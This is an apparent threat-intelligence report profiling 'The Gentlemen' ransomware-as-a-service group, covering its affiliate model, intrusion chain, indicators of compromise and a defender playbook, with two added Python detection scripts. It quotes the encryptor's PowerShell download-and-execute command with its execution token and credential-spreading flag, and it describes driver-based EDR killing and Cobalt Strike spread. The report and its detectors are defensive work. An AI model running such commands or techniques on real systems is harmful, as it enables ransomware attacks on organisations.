By Lyrie Threat Intelligence·5/9/2026

The Gentlemen Arrive: Inside 2026's Most Dangerous New Ransomware Syndicate

TL;DR

A new ransomware-as-a-service operation calling itself The Gentlemen has gone from obscurity to the second most prolific ransomware group tracked in under nine months. First observed in August 2025, the group has already claimed 340+ victims across 50+ countries and 22 industries. A Check Point DFIR investigation published in 2026 laid out a full intrusion chain: Cobalt Strike staging over administrative shares, an attempted SystemBC SOCKS5 proxy deployment, vulnerable-driver (BYOVD) EDR killing, and a purpose-built encryptor with built-in network propagation. With an unusually generous 90/10 affiliate split, a strict CIS exclusion zone pointing to Russian-speaking origins, and a concentration of victims in Asia that no other major group has matched, The Gentlemen show how quickly a RaaS operation can scale. Their operational discipline, multi-platform locker portfolio, and low-friction dark-web affiliate onboarding make them one of the most significant new threat actors to emerge since LockBit 3.0.


Background: A Gentleman's Entrance Into the Criminal Elite

The ransomware threat landscape has historically been a slow churn of established brands (LockBit, Cl0p, ALPHV/BlackCat, RansomHub) with new entrants struggling to differentiate. Then, in mid-to-late August 2025, a post appeared across multiple underground criminal forums promoting a new RaaS program under the name The Gentlemen. The pitch was blunt: a 90% cut for affiliates, multi-platform lockers ready to deploy, EDR-killer tooling included, and pre-built leak site infrastructure for victim pressure operations.

What followed was not typical. Most RaaS operations spend 12–18 months building an affiliate base before achieving meaningful attack volume. The Gentlemen went from that forum post to 240+ claimed victims in the first months of 2026 alone, for a cumulative count in the 320–340 range by April. BlackFog's Q1 2026 ransomware state report attributed 200 undisclosed attacks to the group (9% of all undisclosed ransomware incidents tracked), making them the second most active group in the entire ecosystem behind Qilin.

The name carries deliberate branding. Ransomware operators increasingly understand that their "product" must attract technically skilled affiliates in a competitive marketplace. The genteel framing, carried through their ransom notes, dark web portal, and even an X/Twitter presence, signals that the operators understand that brand identity drives affiliate recruitment.


Organizational Structure: RaaS With Unusual Controls

The 90/10 Model — and Why It's Working

The standard RaaS revenue split in 2025–2026 runs 20–30% to the operator and 70–80% to affiliates. The Gentlemen pushed that much further: affiliates retain 90% of ransom proceeds and operators keep only 10%. This is not charity but market strategy: at 90%, even moderately skilled actors who cannot negotiate better terms elsewhere flow toward the program. FortiGuard Labs notes that the marketplace impact has been significant, though Analyst1 reported "mixed feedback" on whether the group actually runs a true RaaS or a tighter, small coordinated team conducting attacks directly. The operational discipline seen in DFIR analysis (consistent tooling, structured lateral movement, standardized staging paths) supports the hypothesis that a core team hands operationalized playbooks to vetted affiliates rather than running an open-enrollment program.

The Data Escrow Condition

An unusually disciplined requirement separates The Gentlemen from peer RaaS groups: affiliates must exfiltrate victim data before requesting a ransomware binary. Operators verify the exfiltration before providing the customized encryptor. In cases where exfiltration is genuinely impossible, affiliates must submit a written justification and a refundable deposit returned only upon confirmed ransom receipt. This is operationally significant — it guarantees the group retains leverage for double extortion even if the victim recovers from encryption, and it ensures affiliates who might otherwise encrypt-and-run cannot abandon the data theft component.

CIS Exclusion and Attribution Indicators

The group explicitly prohibits affiliates from targeting organizations in Russia and Commonwealth of Independent States (CIS) countries. This is a recognized operational pattern among Russian-speaking cybercriminal groups dating back to REvil and Conti — it both avoids domestic law enforcement attention and reflects cultural alignment. Analyst1's attribution assessment is moderate-confidence: Russian-speaking Eastern European origin, consistent with the established RaaS ecosystem.


Technical Analysis: Inside a Gentlemen Intrusion

Check Point Research published the most detailed DFIR timeline on a Gentlemen-affiliate attack to date. The following synthesis covers the full kill chain.

Phase 1: Initial Access — FortiGate VPN as the Door of Choice

S-RM Intelligence analysis across multiple Gentlemen cases confirms that FortiGate VPN is the overwhelmingly preferred initial access vector. Observed methods include:

  • Credential brute-forcing on VPN portals where MFA is not enforced
  • Exploitation of public-facing vulnerabilities in Fortinet appliances (specific CVEs tied to their intrusion chain have not been fully published, but the pattern aligns with the ongoing series of FortiGate authentication bypass and SSL-VPN vulnerabilities disclosed in 2024–2025)
  • Initial Access Broker (IAB) purchases when direct exploitation is slower than procurement — the group maintains apparent relationships with IABs on underground forums, allowing rapid entry when a target is pre-compromised

Phase 2: Post-Compromise — Privileged Entry and Domain Recon

The first confirmed artifacts in the Check Point case show the attacker already operating at Domain Admin level on a Domain Controller — suggesting either VPN access with privileged credentials, or a rapid escalation from VPN to DC that was not captured in the telemetry. From that position, the attacker performed systematic network reachability testing: a recognizable pattern of failed network logons followed by successful authentications consistent with controlled credential validation sweeps.

Discovery toolkit mapped to FortiGuard data:

  • Advanced IP Scanner — fast host discovery
  • Nmap — port and service enumeration
  • Custom scripts for AD and account enumeration
  • cmd.exe /C systeminfo, whoami, dir c:\users — standard post-compromise fingerprinting
  • Native file reads against internal documentation (Chinese-language hostfile in the Check Point case indicates Asian target environment)
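The "failed network logons followed by successful authentications" pattern above is directly testable in Domain Controller security logs. The following is an added example, not code from Check Point or Lyrie: it correlates Event ID 4625 (failed logon) and 4624 (successful logon), restricted to logon type 3 (network), per source address inside a sliding window. The key=value log rendering, the window size and the failure threshold are assumptions made for the example; the sample log lines are constructed.

```python
"""Detect the credential-validation sweep from Phase 2.

Added example (not Check Point's or Lyrie's code): flag a source that
produces a burst of failed network logons (Event ID 4625, logon type 3)
and then a successful network logon (4624) from the same source within
the window. The key=value log lines, window and threshold are
constructed assumptions for the example; map the parser onto your own
SIEM's field names.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)   # assumed tuning value
MIN_FAILURES = 5                # assumed tuning value
NETWORK_LOGON = 3               # logon type used by SMB/RPC authentication


def parse(line):
    """Parse one simplified 'key=value' rendering of a 4624/4625 event."""
    fields = dict(kv.split("=", 1) for kv in line.split())
    return {
        "ts": datetime.strptime(fields["ts"], "%Y-%m-%dT%H:%M:%S"),
        "event_id": int(fields["event_id"]),
        "src_ip": fields["src_ip"],
        "user": fields["user"],
        "logon_type": int(fields["logon_type"]),
    }


def detect_sweeps(lines, window=WINDOW, min_failures=MIN_FAILURES):
    """Return one alert per source that fails >= min_failures times and then succeeds."""
    failures = defaultdict(deque)  # src_ip -> (timestamp, user) pairs still inside the window
    alerts = []
    for ev in sorted((parse(line) for line in lines), key=lambda e: e["ts"]):
        if ev["logon_type"] != NETWORK_LOGON:
            continue
        recent = failures[ev["src_ip"]]
        # Drop failures that have aged out of the sliding window.
        while recent and ev["ts"] - recent[0][0] > window:
            recent.popleft()
        if ev["event_id"] == 4625:
            recent.append((ev["ts"], ev["user"]))
        elif ev["event_id"] == 4624 and len(recent) >= min_failures:
            alerts.append({
                "src_ip": ev["src_ip"],
                "success_user": ev["user"],
                "failures": len(recent),
                "accounts_tried": sorted({user for _, user in recent}),
                "first_failure": recent[0][0].isoformat(),
                "success_at": ev["ts"].isoformat(),
            })
            recent.clear()  # one alert per burst
    return alerts


# Constructed sample: a sweep from 10.0.0.5 against the DC, plus benign noise from 10.0.0.9.
SAMPLE_LOG = [
    "ts=2026-02-03T01:12:04 event_id=4625 src_ip=10.0.0.5 user=administrator logon_type=3",
    "ts=2026-02-03T01:12:05 event_id=4625 src_ip=10.0.0.5 user=backup logon_type=3",
    "ts=2026-02-03T01:12:05 event_id=4625 src_ip=10.0.0.5 user=sqlsvc logon_type=3",
    "ts=2026-02-03T01:12:06 event_id=4625 src_ip=10.0.0.5 user=helpdesk logon_type=3",
    "ts=2026-02-03T01:12:07 event_id=4625 src_ip=10.0.0.5 user=svc_backup logon_type=3",
    "ts=2026-02-03T01:12:08 event_id=4625 src_ip=10.0.0.5 user=it-admin logon_type=3",
    "ts=2026-02-03T01:12:09 event_id=4624 src_ip=10.0.0.5 user=svc_backup logon_type=3",
    "ts=2026-02-03T01:13:00 event_id=4625 src_ip=10.0.0.9 user=jsmith logon_type=3",
    "ts=2026-02-03T01:13:02 event_id=4624 src_ip=10.0.0.9 user=jsmith logon_type=3",
    "ts=2026-02-03T01:14:00 event_id=4624 src_ip=10.0.0.9 user=jsmith logon_type=2",
]

if __name__ == "__main__":
    for alert in detect_sweeps(SAMPLE_LOG):
        print(alert)
```

The single typo-and-retry from 10.0.0.9 stays below the threshold and is ignored; the six distinct accounts tried from 10.0.0.5 before one succeeds is the sweep. Tune the threshold against your own baseline of service accounts that legitimately fail and retry, and keep the list of accounts tried in the alert, since it tells the responder which credentials the attacker already holds.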

Phase 3: Lateral Movement — Cobalt Strike on Admin Shares

The attacker deployed Cobalt Strike beacons across the environment by writing random-named executables (<7-char-random>.exe) to administrative shares (\\HOST\ADMIN$\) and executing them remotely via RPC. In the classic psexec-style variant this means a service is created through the Service Control Manager, so on the target the dropped binary's parent process is services.exe and a 7045 service-install event is written to the System log. This is textbook Cobalt Strike lateral spread, consistent with a mature affiliate using commercial offensive tooling rather than custom implants.

PowerShell was leveraged via scheduled tasks with execution policy bypass flags — a persistence-plus-propagation mechanism that allowed the Cobalt Strike C2 channel to survive reboots and user logoffs.

Active C2 Infrastructure (from DFIR analysis):

  • Cobalt Strike C2: 91.107.247[.]163 — ports 443 (primary) and 80 (fallback)

Phase 4: EDR Killing — ThrottleBlood.sys Vulnerable Driver

Before deploying the encryptor, affiliates used the Bring-Your-Own-Vulnerable-Driver (BYOVD) technique with ThrottleBlood.sys, a signed but known-vulnerable driver that, once loaded into kernel space, lets a user-mode component terminate protected processes including EDR agents. This is a deliberate and now well-established anti-detection step that places the group above opportunistic ransomware operators. Loading a driver requires local administrator rights, which is why the step follows privilege escalation, and the load itself is the detection point: a kernel driver installed as a service writes System log event 7045, and Sysmon Event ID 6 (DriverLoad) records the image path and signer. The systematic use of EDR killers before encryption helps explain the group's reported success against environments running modern endpoint protection.

Phase 5: SystemBC — Covert Tunneling and Botnet Infrastructure

The intrusion also included an attempt to deploy SystemBC (socks.exe), a proxy malware that establishes SOCKS5 tunneling via a custom RC4-encrypted protocol. SystemBC is favored in human-operated ransomware campaigns precisely because it:

  • Wraps C2 and proxied traffic in RC4, so payload inspection sees only ciphertext (the traffic remains visible by destination address, port and volume, which is what the IOCs below key on)
  • Can download and execute additional payloads in-memory (fileless)
  • Masks lateral movement traffic within the victim network

In the Check Point case, endpoint protection blocked the SystemBC execution — but analysis of the SystemBC C2 server (45.86.230[.]112) revealed a botnet of 1,570+ active victims, predominantly corporate and organizational targets, with the United States, United Kingdom, and Germany leading by infection count. The relationship between this SystemBC infrastructure and The Gentlemen's core operation remains unclear: it may be affiliate tooling or an operator-maintained pre-positioning network.

SystemBC C2: 45.86.230[.]112

Phase 6: Data Exfiltration — Staging Before Encryption

Consistent with the operator requirement for confirmed exfiltration, affiliates stage stolen data at predictable local paths:

  • Staging directory: C:\ProgramData\data
  • Exfiltration protocol: WinSCP via SFTP or WebDAV to attacker-controlled infrastructure
  • Observed alternate method (May 2026): MSP360/CloudBerry Backup client rebranded as "Micro[...]" — a living-off-trusted-tools evasion technique using a legitimate cloud backup agent for exfiltration

Phase 7: Encryption — The grand.exe Propagator

The ransomware binary (grand.exe) is distributed from an internal staging server (often the compromised DC itself) through a PowerShell download-and-execute command. It was observed as a single command line and is wrapped here for readability:

powershell.exe -ExecutionPolicy Bypass -command
  (new-object net.webclient).downloadfile(
    'http://[INTERNAL-DC]:8080/grand.exe',
    'c:\programdata\r.exe');
  c:\programdata\r.exe --password VvO8EtUh --spread [DOMAIN]\[USER]:[PASS]

The --spread flag takes domain credentials and lets the binary push itself to other hosts, so the affiliate does not have to re-deliver it from attacker infrastructure: a clean lateral detonation that leaves fewer C2-related artifacts. The --password argument is an execution gate: without the correct token the binary does not run, which frustrates sandbox detonation of a sample recovered by defenders. The flip side is that the token and the spread credentials appear in process command-line telemetry (Event ID 4688 with command-line auditing enabled, or Sysmon Event ID 1) on every host where the encryptor was launched.
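The artifacts from Phases 3, 4, 6 and 7 (the random-named executable on ADMIN$, the ThrottleBlood.sys driver load, writes under C:\ProgramData\data, and the PowerShell stager with its --password/--spread arguments) are all string-matchable in endpoint telemetry. The following is an added example, not Check Point's or Lyrie's code: a small rule set run over simplified process, file and driver events. The event layout, the UNC rendering of the share path and the sample events are constructed for the example; adapt the field names to your EDR or Sysmon pipeline.

```python
"""Hunt for the host artifacts of Phases 3, 4, 6 and 7 in endpoint telemetry.

Added example, not Check Point's or Lyrie's code. Events are simplified
dicts carrying the fields an EDR or Sysmon pipeline would expose
(process: image + cmdline; file: path; driver: image). The sample events
and the UNC rendering of the ADMIN$ path are constructed for the example;
map the field names onto your own telemetry.
"""
import re
from ntpath import basename

# Phase 3: random 7-character executable written to ADMIN$ or C$.
ADMIN_SHARE_DROP = re.compile(r"^\\\\[^\\]+\\(ADMIN|C)\$\\[A-Za-z0-9]{7}\.exe$", re.I)
# Phase 7: PowerShell fetches the encryptor and runs it with --password/--spread.
PROPAGATOR = re.compile(r"downloadfile\(.*--password\s+\S+.*--spread\s+\S+", re.I | re.S)
# Phase 7: the encryptor launched directly (any image) with both arguments.
ENCRYPTOR_ARGS = re.compile(r"--password\s+\S+\s+--spread\s+\S+", re.I)
# Phase 4: the vulnerable driver named in the DFIR report; extend with hashes in practice.
BYOVD_DRIVERS = {"throttleblood.sys"}
# Phase 6: local staging directory for data awaiting exfiltration.
STAGING_DIR = re.compile(r"^c:\\programdata\\data\\", re.I)


def classify(ev):
    """Return the rule names an event matches (empty list if none)."""
    hits = []
    kind = ev.get("kind")
    if kind == "process":
        cmd = ev.get("cmdline", "")
        image = basename(ev.get("image", "")).lower()
        if (image == "powershell.exe"
                and "-executionpolicy bypass" in cmd.lower()
                and PROPAGATOR.search(cmd)):
            hits.append("phase7_powershell_stager")
        elif ENCRYPTOR_ARGS.search(cmd):
            hits.append("phase7_encryptor_args")
    elif kind == "file":
        path = ev.get("path", "")
        if ADMIN_SHARE_DROP.match(path):
            hits.append("phase3_admin_share_drop")
        if STAGING_DIR.match(path):
            hits.append("phase6_staging_write")
    elif kind == "driver":
        if basename(ev.get("image", "")).lower() in BYOVD_DRIVERS:
            hits.append("phase4_byovd_driver")
    return hits


def hunt(events):
    """Return (event id, rule) pairs for every matching event, in input order."""
    return [(ev["id"], rule) for ev in events for rule in classify(ev)]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed stager command line; hostname and credential placeholders are assumptions.
STAGER_CMD = ("powershell.exe -ExecutionPolicy Bypass -command "
              "(new-object net.webclient).downloadfile("
              "'http://dc01.corp.local:8080/grand.exe','c:\\programdata\\r.exe'); "
              "c:\\programdata\\r.exe --password VvO8EtUh --spread CORP\\[USER]:[PASS]")

# Constructed sample events: ids 1, 3, 5, 6 and 7 are malicious; 2, 4 and 8 are benign.
SAMPLE_EVENTS = [
    {"id": 1, "kind": "file", "path": r"\\FS01\ADMIN$\kq3x9zp.exe"},
    {"id": 2, "kind": "file", "path": r"\\FS01\ADMIN$\backupagent.exe"},
    {"id": 3, "kind": "driver", "image": r"C:\Users\Public\ThrottleBlood.sys"},
    {"id": 4, "kind": "driver", "image": r"C:\Windows\System32\drivers\tcpip.sys"},
    {"id": 5, "kind": "file", "path": r"C:\ProgramData\data\finance-share.zip"},
    {"id": 6, "kind": "process", "image": PS, "cmdline": STAGER_CMD},
    {"id": 7, "kind": "process", "image": r"C:\ProgramData\r.exe",
     "cmdline": "c:\\programdata\\r.exe --password VvO8EtUh --spread CORP\\[USER]:[PASS]"},
    {"id": 8, "kind": "process", "image": PS,
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"},
]

if __name__ == "__main__":
    for event_id, rule in hunt(SAMPLE_EVENTS):
        print(event_id, rule)
```

Two design points matter when moving this into a real pipeline. The ADMIN$ rule keys on name length rather than a specific name, because the name is random per deployment; a legitimate agent installer (event 2) does not match. The driver rule matches on file name only, which an attacker can trivially rename, so in production pair it with the driver's hash or signer and, as the Phase 4 section notes, with the 7045/Sysmon 6 load events rather than file writes alone.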

Locker portfolio:

  • Windows, Linux, NAS, BSD: Go-based multi-OS locker
  • ESXi: C-based dedicated hypervisor locker (maximum VMware infrastructure impact)
  • Features marketed to affiliates: self-deletion, log wiping, concurrent execution

IOCs / Indicators of Compromise

| Indicator | Type | Context |
|---|---|---|
| 91.107.247[.]163 | IP | Cobalt Strike C2 (ports 443, 80) |
| 45.86.230[.]112 | IP | SystemBC C2 (1,570+ victim botnet) |
| ThrottleBlood.sys | Driver filename | BYOVD EDR killer |
| socks.exe | Filename | SystemBC proxy malware |
| grand.exe (downloaded locally as c:\programdata\r.exe) | Filename | Ransomware encryptor (The Gentlemen) |
| C:\ProgramData\data\ | Path | Staging directory for exfiltrated data |
| <random_7_char>.exe in ADMIN$ | Pattern | Cobalt Strike lateral deployment pattern |
| --password VvO8EtUh | CLI arg | Ransomware execution token (observed case) |
| FortiGate VPN portals (no MFA) | Attack surface | Primary initial access vector |
| AnyDesk (post-compromise) | Tool | Persistence / remote access |
| WinSCP + SFTP/WebDAV | Protocol | Data exfiltration channel |
| MSP360/CloudBerry rebranded "Micro*" | Rebranded legitimate tool | Alternative exfil (May 2026 observed) |


Victimology: Asia at the Epicenter

The Gentlemen's targeting profile deviates from the North America–Europe axis that dominates most major ransomware group data. Asia accounts for nearly 46% of all known victims — an unprecedented concentration for a group of this size and scale. Within Asia, Thailand and Japan have recorded elevated hit rates alongside broader Southeast Asian exposure.

The United States remains the single highest-volume individual country by victim count (consistent with the global ransomware attack surface), but the Asia-Pacific weight signals either specialized affiliate recruitment in that region or deliberate market segmentation — possibly both.

Industry targeting spans energy, government, healthcare, manufacturing, construction, IT services, financial services, law firms, and real estate. Small-to-medium enterprises dominate the victim list over large enterprises — consistent with an affiliate model where mid-market targets yield faster payment cycles with less incident response resistance than Fortune 500 organizations.


Lyrie Take: Why The Gentlemen Are a Category-Level Threat

Most new RaaS groups flame out within 60 days. The Gentlemen did the opposite — they accelerated. There are several structural reasons why this group is different:

1. The 90% split changed affiliate economics. By offering a margin that larger, established RaaS operations cannot match without cannibalizing operator revenue, The Gentlemen captured experienced affiliates who brought existing access, established toolchains, and proven techniques. The group essentially weaponized the RaaS labor market.

2. The data escrow model eliminates the single-pay leverage problem. By requiring confirmed exfiltration before issuing the encryptor, operators guarantee double-extortion leverage on every single attack. Groups that allow affiliates to encrypt without exfiltrating lose their leverage the moment victims restore from backup.

3. ESXi targeting in C. The decision to build the ESXi locker in C rather than porting the Go locker shows deliberate engineering for platform-specific optimization. ESXi encryption is the highest-value single execution in enterprise environments: encrypting one hypervisor's datastores takes down every VM it hosts at once.

4. Asia focus is a deliberate white space. The APAC region has historically been underserved by major ransomware IR vendors compared to North America and Europe. Lower public disclosure rates, less mature regulatory reporting requirements in some markets, and different enterprise security maturity profiles make it a favorable hunting ground for rapid affiliate-driven scaling.

5. The Twitter/X account is a new escalation tool. Operating a public social media presence for victim shaming — not just a dark web leak site — moves the pressure campaign into the open internet where target organizations cannot contain information flow. This is an escalation above Cl0p's leak-site model toward full public reputational warfare.


Defender Playbook: Hardening Against The Gentlemen

Immediate Priority (72 hours):

  • Audit FortiGate VPN MFA coverage, The Gentlemen's primary door. Every SSL-VPN portal without enforced MFA is a brute-force and credential-stuffing target. Enforce MFA on all remote-access and administrator accounts today, and alert on bursts of failed SSL-VPN logins per source address.
  • Patch FortiGate SSL-VPN appliances: apply all outstanding Fortinet PSIRT advisories. The group actively exploits vulnerable public-facing infrastructure. If an appliance sat exposed and unpatched through any of the 2024–2025 authentication-bypass disclosures, treat its local VPN credentials as potentially exposed and rotate them rather than only patching.
  • Hunt for ThrottleBlood.sys: query endpoint telemetry (Sysmon Event ID 6, System log event 7045) for this driver name or hash and for any signed driver loaded from user-writable paths such as C:\Users or C:\ProgramData. BYOVD drivers carry valid signatures, so filtering on "unsigned" alone will miss them. This artifact is a clear pre-encryption indicator.
  • Block 45.86.230[.]112 and 91.107.247[.]163 at the perimeter firewall/NGFW and alert on any attempt to reach them. These nodes were live at the time of the DFIR report; keep the entries as detections even after the infrastructure rotates.

Short-Term Hardening (1–2 weeks):

  • Monitor administrative share writes: Cobalt Strike lateral spread via ADMIN$ and C$ writes of random-named executables appears as Event ID 5145 share-access records on the target (with file-share auditing enabled), followed by a 7045 service-install event and services.exe spawning the dropped executable. Tune alerting on that sequence; svchost.exe is not the parent in this pattern.
  • Restrict WinSCP, MSP360/CloudBerry, AnyDesk to authorized users with approval workflows. These legitimate tools are primary exfiltration and persistence vectors in Gentlemen attacks.
  • LSASS protection: enable Credential Guard and LSASS protected-process mode (RunAsPPL) to slow credential dumping, the precondition for the credential-validation sweeps and PsExec-style remote service execution seen in Gentlemen lateral movement.
  • Segment Active Directory from internet-adjacent systems — The pattern of achieving DC-level access quickly after VPN entry suggests insufficient AD tier segmentation.

Strategic Defense:

  • Implement network egress controls for SFTP/WebDAV to non-approved hosts. Gentlemen exfiltrate to attacker-controlled SFTP servers — an egress allowlist would contain this at the data-loss stage even if the attacker achieves network presence.
  • Review cloud backup agent deployments — The MSP360/CloudBerry rebranding technique (May 2026) demonstrates the group's willingness to weaponize trusted backup channels. Audit all installed backup agents against approved software lists.
  • Dark web monitoring — The group maintains a public leak site and X/Twitter account. Lyrie's dark web intelligence module provides pre-publication monitoring to detect organizational data staging before public disclosure.

Sources

1. Check Point Research — "DFIR Report – The Gentlemen & SystemBC: A Sneak Peek Behind the Proxy" (May 2026) — https://research.checkpoint.com/2026/dfir-report-the-gentlemen/

2. FortiGuard Labs — "The Gentlemen Ransomware Threat Actor Profile" (May 2026) — https://www.fortiguard.com/threat-actor/6387/the-gentlemen-ransomware

3. S-RM Intelligence — "Ransomware in Focus: Meet The Gentleman" (May 2026) — https://www.s-rminform.com/latest-thinking/ransomware-in-focus-meet-the-gentleman

4. BlackFog / Industrial Cyber — "The State of Ransomware Q1 2026" (May 2026) — https://industrialcyber.co/ransomware/ransomware-activity-holds-steady-in-q1-2026-as-threat-actors-prioritise-data-theft-over-disruption-blackfog-finds/


Lyrie.ai Cyber Research Division — Senior Analyst Desk

Lyrie Verdict

Lyrie's autonomous defense layer flags this class of exposure the moment it surfaces — no signature update required.